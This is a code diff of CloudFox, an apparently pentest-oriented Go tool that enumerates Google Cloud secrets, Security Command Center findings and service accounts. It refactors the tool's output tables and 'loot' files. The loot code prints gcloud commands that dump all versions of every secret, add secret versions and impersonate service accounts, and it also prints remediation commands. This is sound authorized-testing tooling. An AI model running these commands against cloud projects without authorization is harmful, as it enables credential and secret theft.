versions access latest --secret=%s --project=%s\n"+ - "# Access specific version:\n"+ - "gcloud secrets versions access 1 --secret=%s --project=%s\n\n", - secretName, - secretName, secret.ProjectID, - secretName, secret.ProjectID, - ) + // KMS key info + if secret.KMSKeyName != "" { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# KMS Key: %s\n", secret.KMSKeyName) + } - // Exploitation commands - m.LootMap["secrets-exploitation"].Contents += fmt.Sprintf( - "# Secret: %s (Project: %s)\n"+ - "# Download all versions:\n"+ - "for v in $(gcloud secrets versions list %s --project=%s --format='value(name)'); do\n"+ - " echo \"=== Version $v ===\"\n"+ - " gcloud secrets versions access $v --secret=%s --project=%s\n"+ - "done\n\n"+ - "# Add a new version (requires write access):\n"+ - "echo -n 'new-secret-value' | gcloud secrets versions add %s --project=%s --data-file=-\n\n", - secretName, secret.ProjectID, - secretName, secret.ProjectID, - secretName, secret.ProjectID, - secretName, secret.ProjectID, - ) + // Rotation info + if secret.Rotation == "enabled" { + if secret.RotationPeriod != "" { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# Rotation Period: %s\n", secret.RotationPeriod) + } + if secret.NextRotationTime != "" { + m.LootMap["secrets-commands"].Contents += fmt.Sprintf("# Next Rotation: %s\n", secret.NextRotationTime) + } + } // IAM bindings if len(secret.IAMBindings) > 0 { - m.LootMap["secrets-iam-bindings"].Contents += fmt.Sprintf( - "# Secret: %s (Project: %s)\n", - secretName, secret.ProjectID, - ) + m.LootMap["secrets-commands"].Contents += "# IAM Bindings:\n" for _, binding := range secret.IAMBindings { - m.LootMap["secrets-iam-bindings"].Contents += fmt.Sprintf( - "# Role: %s\n# Members: %s\n", + m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + "# %s: %s\n", binding.Role, strings.Join(binding.Members, ", "), ) } - m.LootMap["secrets-iam-bindings"].Contents += "\n" - } - - // Rotation status - if secret.Rotation == "disabled" { - m.LootMap["secrets-no-rotation"].Contents += fmt.Sprintf( - "# SECRET: %s (Project: %s)\n"+ - "# Encryption: %s\n"+ - "# Created: %s\n"+ - "# Enable rotation:\n"+ - "gcloud secrets update %s \\\n"+ - " --rotation-period=90d \\\n"+ - " --next-rotation-time=$(date -u -d '+1 day' +%%Y-%%m-%%dT%%H:%%M:%%SZ) \\\n"+ - " --project=%s\n\n", - secretName, secret.ProjectID, - secret.EncryptionType, - secret.CreationTime, - secretName, secret.ProjectID, - ) - } else { - nextRotation := secret.NextRotationTime - if nextRotation == "" { - nextRotation = "Not scheduled" - } - rotationPeriod := secret.RotationPeriod - if rotationPeriod == "" { - rotationPeriod = "Not set" - } - m.LootMap["secrets-with-rotation"].Contents += fmt.Sprintf( - "# SECRET: %s (Project: %s)\n"+ - "# Rotation Period: %s\n"+ - "# Next Rotation: %s\n\n", - secretName, secret.ProjectID, - rotationPeriod, - nextRotation, - ) - } - - // Encryption type - if secret.EncryptionType == "Google-managed" { - m.LootMap["secrets-google-managed"].Contents += fmt.Sprintf( - "# SECRET: %s (Project: %s)\n"+ - "# Encryption: Google-managed\n"+ - "# NOTE: CMEK must be set at secret creation time\n\n", - secretName, secret.ProjectID, - ) - } else if secret.EncryptionType == "CMEK" { - kmsKey := secret.KMSKeyName - if kmsKey == "" { - kmsKey = "Unknown" - } - m.LootMap["secrets-cmek"].Contents += fmt.Sprintf( - "# SECRET: %s (Project: %s)\n"+ - "# Encryption: CMEK\n"+ - "# KMS Key: %s\n\n", - secretName, secret.ProjectID, kmsKey, - ) } - // Check for public access - for _, binding := range secret.IAMBindings { - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { - m.LootMap["secrets-public-access"].Contents += fmt.Sprintf( - "# CRITICAL: Secret with PUBLIC access!\n"+ - "# SECRET: %s (Project: %s)\n"+ - "# Role: %s, Member: %s\n"+ - "# Remove public access:\n"+ - "gcloud secrets remove-iam-policy-binding %s \\\n"+ - " --member='%s' \\\n"+ - " --role='%s' \\\n"+ - " --project=%s\n\n", - secretName, secret.ProjectID, - binding.Role, member, - secretName, member, binding.Role, secret.ProjectID, - ) - } - } - } - - // Security recommendations - m.addSecretSecurityRecommendations(secret, secretName) -} - -// addSecretSecurityRecommendations adds remediation commands for secret security issues -func (m *SecretsModule) addSecretSecurityRecommendations(secret SecretsService.SecretInfo, secretName string) { - hasRecommendations := false - recommendations := fmt.Sprintf( - "# SECRET: %s (Project: %s)\n", + // Commands + m.LootMap["secrets-commands"].Contents += fmt.Sprintf( + "\n# Describe secret:\n"+ + "gcloud secrets describe %s --project=%s\n"+ + "# List versions:\n"+ + "gcloud secrets versions list %s --project=%s\n"+ + "# Get IAM policy:\n"+ + "gcloud secrets get-iam-policy %s --project=%s\n"+ + "# Access latest version:\n"+ + "gcloud secrets versions access latest --secret=%s --project=%s\n"+ + "# Download all versions:\n"+ + "for v in $(gcloud secrets versions list %s --project=%s --format='value(name)'); do\n"+ + " echo \"=== Version $v ===\"\n"+ + " gcloud secrets versions access $v --secret=%s --project=%s\n"+ + "done\n"+ + "# Add a new version:\n"+ + "echo -n 'new-secret-value' | gcloud secrets versions add %s --project=%s --data-file=-\n\n", + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, + secretName, secret.ProjectID, secretName, secret.ProjectID, ) - - // No rotation - if secret.Rotation == "disabled" { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: Rotation not configured\n"+ - "gcloud secrets update %s \\\n"+ - " --rotation-period=90d \\\n"+ - " --next-rotation-time=$(date -u -d '+1 day' +%%Y-%%m-%%dT%%H:%%M:%%SZ) \\\n"+ - " --project=%s\n\n", - secretName, secret.ProjectID, - ) - } - - // No version destroy TTL - if secret.VersionDestroyTTL == "" { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: No version destroy TTL (old versions deleted immediately)\n"+ - "# Consider adding a delay for recovery:\n"+ - "gcloud secrets update %s \\\n"+ - " --version-destroy-ttl=86400s \\\n"+ - " --project=%s\n\n", - secretName, secret.ProjectID, - ) - } - - // Check for overly permissive IAM - for _, binding := range secret.IAMBindings { - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { - hasRecommendations = true - recommendations += fmt.Sprintf( - "# Issue: PUBLIC access (member: %s)\n"+ - "gcloud secrets remove-iam-policy-binding %s \\\n"+ - " --member='%s' \\\n"+ - " --role='%s' \\\n"+ - " --project=%s\n\n", - member, secretName, member, binding.Role, secret.ProjectID, - ) - } - } - } - - if hasRecommendations { - m.LootMap["secrets-security-recommendations"].Contents += recommendations + "\n" - } } + // ------------------------------ // Helper functions // ------------------------------ @@ -437,17 +272,23 @@ func getSecretMemberType(member string) string { // Output Generation // ------------------------------ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Main table with security-relevant columns + // Combined table with IAM columns (one row per IAM member) header := []string{ "Project Name", "Project ID", "Name", "Encryption", + "KMS Key", "Replication", "Rotation", + "Rotation Period", + "Next Rotation", "Expiration", - "VersionDestroyTTL", + "Destroy TTL", "Created", + "IAM Role", + "Member Type", + "IAM Member", } var body [][]string @@ -465,107 +306,79 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) } // Format version destroy TTL - versionDestroyTTL := "-" + destroyTTL := "-" if secret.VersionDestroyTTL != "" { - versionDestroyTTL = secret.VersionDestroyTTL + destroyTTL = secret.VersionDestroyTTL } - body = append(body, []string{ - m.GetProjectName(secret.ProjectID), - secret.ProjectID, - secretName, - secret.EncryptionType, - secret.ReplicationType, - secret.Rotation, - expiration, - versionDestroyTTL, - secret.CreationTime, - }) - } - - // Detailed IAM table - one row per member - iamHeader := []string{ - "Secret", - "Project Name", - "Project ID", - "Role", - "Member Type", - "Member", - } - - var iamBody [][]string - for _, secret := range m.Secrets { - secretName := getSecretShortName(secret.Name) - for _, binding := range secret.IAMBindings { - for _, member := range binding.Members { - memberType := getSecretMemberType(member) - iamBody = append(iamBody, []string{ - secretName, - m.GetProjectName(secret.ProjectID), - secret.ProjectID, - binding.Role, - memberType, - member, - }) - } + // Format KMS key (no truncation) + kmsKey := "-" + if secret.KMSKeyName != "" { + kmsKey = secret.KMSKeyName } - } - - // Security configuration table - securityHeader := []string{ - "Secret", - "Project Name", - "Project ID", - "Rotation", - "Next Rotation", - "Rotation Period", - "Encrypt", - "KMS Key", - "Destroy TTL", - } - var securityBody [][]string - for _, secret := range m.Secrets { - secretName := getSecretShortName(secret.Name) - nextRotation := secret.NextRotationTime - if nextRotation == "" { - nextRotation = "-" + // Format rotation period + rotationPeriod := "-" + if secret.RotationPeriod != "" { + rotationPeriod = secret.RotationPeriod } - rotationPeriod := secret.RotationPeriod - if rotationPeriod == "" { - rotationPeriod = "-" + + // Format next rotation + nextRotation := "-" + if secret.NextRotationTime != "" { + nextRotation = secret.NextRotationTime } - kmsKey := secret.KMSKeyName - if kmsKey == "" { - kmsKey = "-" - } else { - // Truncate long key names - parts := strings.Split(kmsKey, "/") - if len(parts) > 0 { - kmsKey = parts[len(parts)-1] + + // One row per IAM member + if len(secret.IAMBindings) > 0 { + for _, binding := range secret.IAMBindings { + for _, member := range binding.Members { + memberType := getSecretMemberType(member) + body = append(body, []string{ + m.GetProjectName(secret.ProjectID), + secret.ProjectID, + secretName, + secret.EncryptionType, + kmsKey, + secret.ReplicationType, + secret.Rotation, + rotationPeriod, + nextRotation, + expiration, + destroyTTL, + secret.CreationTime, + binding.Role, + memberType, + member, + }) + } } + } else { + // Secret with no IAM bindings + body = append(body, []string{ + m.GetProjectName(secret.ProjectID), + secret.ProjectID, + secretName, + secret.EncryptionType, + kmsKey, + secret.ReplicationType, + secret.Rotation, + rotationPeriod, + nextRotation, + expiration, + destroyTTL, + secret.CreationTime, + "-", + "-", + "-", + }) } - destroyTTL := secret.VersionDestroyTTL - if destroyTTL == "" { - destroyTTL = "-" - } - securityBody = append(securityBody, []string{ - secretName, - m.GetProjectName(secret.ProjectID), - secret.ProjectID, - secret.Rotation, - nextRotation, - rotationPeriod, - secret.EncryptionType, - kmsKey, - destroyTTL, - }) } // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -579,22 +392,6 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) }, } - // Add IAM table if there are bindings - if len(iamBody) > 0 { - tableFiles = append(tableFiles, internal.TableFile{ - Name: "secrets-iam", - Header: iamHeader, - Body: iamBody, - }) - } - - // Always add security config table - tableFiles = append(tableFiles, internal.TableFile{ - Name: "secrets-security-config", - Header: securityHeader, - Body: securityBody, - }) - output := SecretsOutput{ Table: tableFiles, Loot: lootFiles, diff --git a/gcp/commands/securitycenter.go b/gcp/commands/securitycenter.go index a2b28476..d6f28e07 100644 --- a/gcp/commands/securitycenter.go +++ b/gcp/commands/securitycenter.go @@ -23,6 +23,7 @@ const GCP_SECURITYCENTER_MODULE_NAME string = "security-center" var GCPSecurityCenterCommand = &cobra.Command{ Use: GCP_SECURITYCENTER_MODULE_NAME, Aliases: []string{"scc", "security", "defender"}, + Hidden: true, Short: "Enumerate Security Command Center findings and recommendations", Long: `Enumerate Security Command Center (SCC) findings, assets, and security recommendations. @@ -51,11 +52,9 @@ type SCCFinding struct { ResourceType string ProjectID string Description string - Recommendation string CreateTime string SourceDisplayName string ExternalURI string - RiskScore int } type SCCAsset struct { @@ -135,8 +134,8 @@ func (m *SecurityCenterModule) Execute(ctx context.Context, logger internal.Logg // Create Security Command Center client client, err := securitycenter.NewClient(ctx) if err != nil { - logger.ErrorM(fmt.Sprintf("Failed to create Security Command Center client: %v", err), GCP_SECURITYCENTER_MODULE_NAME) - logger.InfoM("Ensure the Security Command Center API is enabled and you have appropriate permissions", GCP_SECURITYCENTER_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "securitycenter.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, GCP_SECURITYCENTER_MODULE_NAME, "Failed to create client") return } defer client.Close() @@ -205,8 +204,9 @@ func (m *SecurityCenterModule) processProject(ctx context.Context, projectID str } if err != nil { m.CommandCounter.Error++ - gcpinternal.HandleGCPError(err, logger, GCP_SECURITYCENTER_MODULE_NAME, - fmt.Sprintf("Could not enumerate findings in project %s", projectID)) + parsedErr := gcpinternal.ParseGCPError(err, "securitycenter.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, GCP_SECURITYCENTER_MODULE_NAME, + fmt.Sprintf("Project %s", projectID)) break } @@ -298,12 +298,6 @@ func (m *SecurityCenterModule) parseFinding(finding *securitycenterpb.Finding, p } } - // Calculate risk score based on severity and category - sccFinding.RiskScore = calculateRiskScore(sccFinding.Severity, sccFinding.Category) - - // Generate recommendation based on category - sccFinding.Recommendation = generateRecommendation(sccFinding.Category, sccFinding.ResourceType) - return sccFinding } @@ -323,207 +317,73 @@ func severityRank(severity string) int { } } -// calculateRiskScore calculates a risk score based on severity and category -func calculateRiskScore(severity, category string) int { - baseScore := 0 - switch severity { - case "CRITICAL": - baseScore = 90 - case "HIGH": - baseScore = 70 - case "MEDIUM": - baseScore = 50 - case "LOW": - baseScore = 30 - default: - baseScore = 10 - } - - // Adjust based on category - categoryLower := strings.ToLower(category) - if strings.Contains(categoryLower, "public") { - baseScore += 10 - } - if strings.Contains(categoryLower, "credential") || strings.Contains(categoryLower, "secret") { - baseScore += 10 - } - if strings.Contains(categoryLower, "firewall") || strings.Contains(categoryLower, "open") { - baseScore += 5 - } - - if baseScore > 100 { - baseScore = 100 - } - return baseScore -} - -// generateRecommendation generates a remediation recommendation based on category -func generateRecommendation(category, resourceType string) string { - categoryLower := strings.ToLower(category) - - switch { - case strings.Contains(categoryLower, "public"): - return "Restrict public access and implement proper network controls" - case strings.Contains(categoryLower, "firewall"): - return "Review and restrict firewall rules to limit exposure" - case strings.Contains(categoryLower, "encryption"): - return "Enable encryption at rest and in transit" - case strings.Contains(categoryLower, "iam"): - return "Review IAM permissions and apply least privilege principle" - case strings.Contains(categoryLower, "logging"): - return "Enable audit logging and monitoring" - case strings.Contains(categoryLower, "mfa") || strings.Contains(categoryLower, "2sv"): - return "Enable multi-factor authentication" - case strings.Contains(categoryLower, "ssl") || strings.Contains(categoryLower, "tls"): - return "Upgrade to TLS 1.2+ and disable weak ciphers" - case strings.Contains(categoryLower, "password"): - return "Implement strong password policies" - case strings.Contains(categoryLower, "key"): - return "Rotate keys and implement key management best practices" - case strings.Contains(categoryLower, "backup"): - return "Implement backup and disaster recovery procedures" - default: - return "Review finding and implement appropriate security controls" - } -} - // ------------------------------ // Loot File Management // ------------------------------ func (m *SecurityCenterModule) initializeLootFiles() { - m.LootMap["scc-critical-findings"] = &internal.LootFile{ - Name: "scc-critical-findings", - Contents: "# Security Command Center - Critical Findings\n# Generated by CloudFox\n# These require immediate attention!\n\n", - } - m.LootMap["scc-high-severity"] = &internal.LootFile{ - Name: "scc-high-severity", - Contents: "# Security Command Center - High Severity Findings\n# Generated by CloudFox\n\n", - } - m.LootMap["scc-remediation-commands"] = &internal.LootFile{ - Name: "scc-remediation-commands", - Contents: "# Security Command Center - Remediation Commands\n# Generated by CloudFox\n# These commands can help address security findings\n\n", - } - m.LootMap["scc-affected-assets"] = &internal.LootFile{ - Name: "scc-affected-assets", - Contents: "# Security Command Center - Affected Assets\n# Generated by CloudFox\n\n", - } - m.LootMap["scc-exploitation-commands"] = &internal.LootFile{ - Name: "scc-exploitation-commands", - Contents: "# Security Command Center - Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + m.LootMap["security-center-commands"] = &internal.LootFile{ + Name: "security-center-commands", + Contents: "# Security Command Center Commands\n" + + "# Generated by CloudFox\n" + + "# WARNING: Only use with proper authorization\n\n", } } func (m *SecurityCenterModule) addFindingToLoot(finding SCCFinding, projectID string) { - // Critical findings - if finding.Severity == "CRITICAL" { - m.LootMap["scc-critical-findings"].Contents += fmt.Sprintf( - "## Finding: %s\n"+ - "Category: %s\n"+ - "Resource: %s\n"+ - "Project: %s\n"+ - "Risk Score: %d\n"+ - "Description: %s\n"+ - "Recommendation: %s\n\n", - finding.Name, - finding.Category, - finding.ResourceName, - projectID, - finding.RiskScore, - finding.Description, - finding.Recommendation, - ) + // Only add CRITICAL and HIGH severity findings to loot + if finding.Severity != "CRITICAL" && finding.Severity != "HIGH" { + return } - // High severity findings - if finding.Severity == "HIGH" { - m.LootMap["scc-high-severity"].Contents += fmt.Sprintf( - "## Finding: %s\n"+ - "Category: %s\n"+ - "Resource: %s\n"+ - "Project: %s\n"+ - "Recommendation: %s\n\n", - finding.Name, - finding.Category, - finding.ResourceName, - projectID, - finding.Recommendation, - ) + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "## Finding: %s (%s)\n"+ + "# Category: %s\n"+ + "# Resource: %s\n"+ + "# Project: %s\n", + finding.Name, finding.Severity, + finding.Category, + finding.ResourceName, + projectID, + ) + + if finding.Description != "" { + m.LootMap["security-center-commands"].Contents += fmt.Sprintf("# Description: %s\n", finding.Description) + } + + if finding.ExternalURI != "" { + m.LootMap["security-center-commands"].Contents += fmt.Sprintf("# Console URL: %s\n", finding.ExternalURI) } - // Remediation commands based on category + // Add gcloud commands + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "\n# View finding details:\n"+ + "gcloud scc findings list --source=\"-\" --project=%s --filter=\"name:\\\"%s\\\"\"\n\n", + projectID, finding.Name, + ) + + // Add specific commands based on category categoryLower := strings.ToLower(finding.Category) - if finding.Severity == "CRITICAL" || finding.Severity == "HIGH" { - m.LootMap["scc-remediation-commands"].Contents += fmt.Sprintf( - "# %s (%s)\n"+ - "# Resource: %s\n", - finding.Category, - finding.Severity, + switch { + case strings.Contains(categoryLower, "public_bucket"): + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "# Remove public access:\n"+ + "gsutil iam ch -d allUsers:objectViewer %s\n"+ + "gsutil iam ch -d allAuthenticatedUsers:objectViewer %s\n\n", + finding.ResourceName, finding.ResourceName, ) - - // Add specific remediation commands based on category - switch { - case strings.Contains(categoryLower, "public_bucket"): - m.LootMap["scc-remediation-commands"].Contents += fmt.Sprintf( - "gsutil iam ch -d allUsers:objectViewer %s\n"+ - "gsutil iam ch -d allAuthenticatedUsers:objectViewer %s\n\n", - finding.ResourceName, - finding.ResourceName, - ) - case strings.Contains(categoryLower, "firewall"): - m.LootMap["scc-remediation-commands"].Contents += fmt.Sprintf( - "# Review firewall rule:\n"+ - "gcloud compute firewall-rules describe %s --project=%s\n"+ - "# Delete if unnecessary:\n"+ - "# gcloud compute firewall-rules delete %s --project=%s\n\n", - finding.ResourceName, - projectID, - finding.ResourceName, - projectID, - ) - case strings.Contains(categoryLower, "service_account_key"): - m.LootMap["scc-remediation-commands"].Contents += fmt.Sprintf( - "# List and delete old keys:\n"+ - "gcloud iam service-accounts keys list --iam-account=%s\n\n", - finding.ResourceName, - ) - default: - m.LootMap["scc-remediation-commands"].Contents += fmt.Sprintf( - "# See SCC console for detailed remediation steps:\n"+ - "# %s\n\n", - finding.ExternalURI, - ) - } - - // Add exploitation commands for pentest - switch { - case strings.Contains(categoryLower, "public"): - m.LootMap["scc-exploitation-commands"].Contents += fmt.Sprintf( - "# Publicly accessible resource: %s\n"+ - "# Category: %s\n"+ - "# Attempt to access without authentication\n\n", - finding.ResourceName, - finding.Category, - ) - case strings.Contains(categoryLower, "firewall"): - m.LootMap["scc-exploitation-commands"].Contents += fmt.Sprintf( - "# Open firewall rule detected: %s\n"+ - "# Category: %s\n"+ - "# Scan for accessible services:\n"+ - "# nmap -Pn -p- \n\n", - finding.ResourceName, - finding.Category, - ) - } - } - - // Track affected assets - if finding.ResourceName != "" { - m.LootMap["scc-affected-assets"].Contents += fmt.Sprintf( - "%s (%s) - %s\n", + case strings.Contains(categoryLower, "firewall"): + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "# Review firewall rule:\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n\n", + finding.ResourceName, + projectID, + ) + case strings.Contains(categoryLower, "service_account_key"): + m.LootMap["security-center-commands"].Contents += fmt.Sprintf( + "# List service account keys:\n"+ + "gcloud iam service-accounts keys list --iam-account=%s\n\n", finding.ResourceName, - finding.Severity, - finding.Category, ) } } @@ -539,107 +399,77 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. // Main findings table findingsHeader := []string{ + "Project Name", + "Project ID", "Severity", "Category", "Resource", - "Project Name", - "Project ID", - "Risk Score", + "Resource Type", + "State", "Created", + "External URI", } var findingsBody [][]string for _, f := range m.Findings { + resourceType := f.ResourceType + if resourceType == "" { + resourceType = "-" + } + externalURI := f.ExternalURI + if externalURI == "" { + externalURI = "-" + } + findingsBody = append(findingsBody, []string{ - f.Severity, - f.Category, - sccTruncateString(f.ResourceName, 60), m.GetProjectName(f.ProjectID), f.ProjectID, - fmt.Sprintf("%d", f.RiskScore), + f.Severity, + f.Category, + f.ResourceName, + resourceType, + f.State, f.CreateTime, + externalURI, }) } - // Critical/High findings table - criticalHeader := []string{ - "Category", - "Resource", - "Project Name", - "Project ID", - "Description", - "Recommendation", - } - - var criticalBody [][]string - for _, f := range m.Findings { - if f.Severity == "CRITICAL" || f.Severity == "HIGH" { - criticalBody = append(criticalBody, []string{ - f.Category, - sccTruncateString(f.ResourceName, 50), - m.GetProjectName(f.ProjectID), - f.ProjectID, - sccTruncateString(f.Description, 60), - sccTruncateString(f.Recommendation, 50), - }) - } - } - // Assets table assetsHeader := []string{ - "Resource", - "Type", "Project Name", "Project ID", + "Resource", + "Resource Type", "Finding Count", "Max Severity", } var assetsBody [][]string for _, asset := range m.Assets { + resourceType := asset.ResourceType + if resourceType == "" { + resourceType = "-" + } + assetsBody = append(assetsBody, []string{ - sccTruncateString(asset.ResourceName, 60), - asset.ResourceType, m.GetProjectName(asset.ProjectID), asset.ProjectID, + asset.ResourceName, + resourceType, fmt.Sprintf("%d", asset.FindingCount), asset.Severity, }) } - // Sort assets by finding count (index 4 now, not 3, since we added Project Name column) + // Sort assets by finding count sort.Slice(assetsBody, func(i, j int) bool { return assetsBody[i][4] > assetsBody[j][4] }) - // Summary by category - categoryCount := make(map[string]int) - for _, f := range m.Findings { - categoryCount[f.Category]++ - } - - summaryHeader := []string{ - "Category", - "Finding Count", - } - - var summaryBody [][]string - for cat, count := range categoryCount { - summaryBody = append(summaryBody, []string{ - cat, - fmt.Sprintf("%d", count), - }) - } - - // Sort summary by count - sort.Slice(summaryBody, func(i, j int) bool { - return summaryBody[i][1] > summaryBody[j][1] - }) - - // Collect loot files + // Collect loot files - only include if they have content beyond the header var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -653,16 +483,6 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. }, } - // Add critical/high findings table if any - if len(criticalBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "scc-critical-high", - Header: criticalHeader, - Body: criticalBody, - }) - logger.InfoM(fmt.Sprintf("[FINDING] Found %d CRITICAL/HIGH severity finding(s)", len(criticalBody)), GCP_SECURITYCENTER_MODULE_NAME) - } - // Add assets table if any if len(assetsBody) > 0 { tables = append(tables, internal.TableFile{ @@ -672,15 +492,6 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. }) } - // Add summary table - if len(summaryBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "scc-summary", - Header: summaryHeader, - Body: summaryBody, - }) - } - output := SecurityCenterOutput{ Table: tables, Loot: lootFiles, @@ -710,11 +521,3 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. m.CommandCounter.Error++ } } - -// sccTruncateString truncates a string to max length with ellipsis -func sccTruncateString(s string, maxLen int) string { - if len(s) <= maxLen { - return s - } - return s[:maxLen-3] + "..." -} diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go index 643c4445..4c853211 100644 --- a/gcp/commands/serviceaccounts.go +++ b/gcp/commands/serviceaccounts.go @@ -26,9 +26,7 @@ Features: - Identifies default service accounts (Compute, App Engine, etc.) - Detects disabled service accounts - Flags service accounts without key rotation -- Shows service account roles and permissions -- Identifies cross-project service account bindings -- Generates exploitation commands for penetration testing`, +- Identifies impersonation opportunities`, Run: runGCPServiceAccountsCommand, } @@ -39,11 +37,7 @@ type ServiceAccountAnalysis struct { DefaultSAType string // "compute", "appengine", "cloudbuild", etc. OldestKeyAge int // Days HasExpiredKeys bool - HasOldKeys bool // Keys older than 90 days - KeyAgeWarning string - RiskLevel string // HIGH, MEDIUM, LOW - RiskReasons []string - ImpersonationCmds []string + HasOldKeys bool // Keys older than 90 days // Pentest: Impersonation analysis ImpersonationInfo *IAMService.SAImpersonationInfo } @@ -110,22 +104,22 @@ func (m *ServiceAccountsModule) Execute(ctx context.Context, logger internal.Log // Count findings withKeys := 0 - highRisk := 0 defaultSAs := 0 + impersonatable := 0 for _, sa := range m.ServiceAccounts { if sa.HasKeys { withKeys++ } - if sa.RiskLevel == "HIGH" { - highRisk++ - } if sa.IsDefaultSA { defaultSAs++ } + if sa.ImpersonationInfo != nil && (len(sa.ImpersonationInfo.TokenCreators) > 0 || len(sa.ImpersonationInfo.KeyCreators) > 0) { + impersonatable++ + } } - logger.SuccessM(fmt.Sprintf("Found %d service account(s) (%d with keys, %d high-risk, %d default)", - len(m.ServiceAccounts), withKeys, highRisk, defaultSAs), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d service account(s) (%d with keys, %d default, %d impersonatable)", + len(m.ServiceAccounts), withKeys, defaultSAs, impersonatable), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) // Write output m.writeOutput(ctx, logger) @@ -192,8 +186,6 @@ func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID st func (m *ServiceAccountsModule) analyzeServiceAccount(sa IAMService.ServiceAccountInfo, projectID string) ServiceAccountAnalysis { analyzed := ServiceAccountAnalysis{ ServiceAccountInfo: sa, - RiskReasons: []string{}, - ImpersonationCmds: []string{}, } // Check if it's a default service account @@ -225,22 +217,8 @@ func (m *ServiceAccountsModule) analyzeServiceAccount(sa IAMService.ServiceAccou } analyzed.OldestKeyAge = oldestAge - if oldestAge > 365 { - analyzed.KeyAgeWarning = fmt.Sprintf("%d days (>1 year)", oldestAge) - } else if oldestAge > 90 { - analyzed.KeyAgeWarning = fmt.Sprintf("%d days (>90 days)", oldestAge) - } - } - - // Generate impersonation commands - analyzed.ImpersonationCmds = []string{ - fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", sa.Email), - fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", sa.Email), } - // Determine risk level - analyzed.RiskLevel, analyzed.RiskReasons = determineServiceAccountRisk(analyzed) - return analyzed } @@ -272,7 +250,6 @@ func isDefaultServiceAccount(email, projectID string) (bool, string) { return true, "Compute/Dataflow" } - // Cloud Run service account (uses compute default) // GKE service account if strings.Contains(email, "@container-engine-robot.iam.gserviceaccount.com") { return true, "GKE" @@ -301,414 +278,263 @@ func isDefaultServiceAccount(email, projectID string) (bool, string) { return false, "" } -// determineServiceAccountRisk determines the risk level of a service account -func determineServiceAccountRisk(sa ServiceAccountAnalysis) (string, []string) { - var reasons []string - score := 0 - - // High-risk indicators - if sa.HasKeys && sa.OldestKeyAge > 365 { - reasons = append(reasons, "Key older than 1 year without rotation") - score += 3 - } else if sa.HasKeys && sa.OldestKeyAge > 90 { - reasons = append(reasons, "Key older than 90 days") - score += 2 - } - - if sa.HasExpiredKeys { - reasons = append(reasons, "Has expired keys (cleanup needed)") - score += 1 - } - - if sa.HasKeys && sa.KeyCount > 2 { - reasons = append(reasons, fmt.Sprintf("Multiple user-managed keys (%d)", sa.KeyCount)) - score += 1 - } - - if sa.IsDefaultSA && sa.HasKeys { - reasons = append(reasons, fmt.Sprintf("Default SA (%s) with user-managed keys", sa.DefaultSAType)) - score += 2 - } - - if sa.Disabled && sa.HasKeys { - reasons = append(reasons, "Disabled SA with active keys") - score += 2 - } - - // Determine risk level - if score >= 4 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - - return "INFO", reasons -} - // ------------------------------ // Loot File Management // ------------------------------ func (m *ServiceAccountsModule) initializeLootFiles() { - m.LootMap["sa-impersonation-commands"] = &internal.LootFile{ - Name: "sa-impersonation-commands", - Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["sa-key-creation-commands"] = &internal.LootFile{ - Name: "sa-key-creation-commands", - Contents: "# Service Account Key Creation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", - } - m.LootMap["sa-high-risk"] = &internal.LootFile{ - Name: "sa-high-risk", - Contents: "# High-Risk Service Accounts\n# Generated by CloudFox\n\n", - } - m.LootMap["sa-old-keys"] = &internal.LootFile{ - Name: "sa-old-keys", - Contents: "# Service Accounts with Old Keys (>90 days)\n# Generated by CloudFox\n# Consider rotating these keys\n\n", - } - m.LootMap["sa-default-accounts"] = &internal.LootFile{ - Name: "sa-default-accounts", - Contents: "# Default Service Accounts\n# Generated by CloudFox\n# These often have broad permissions\n\n", - } - 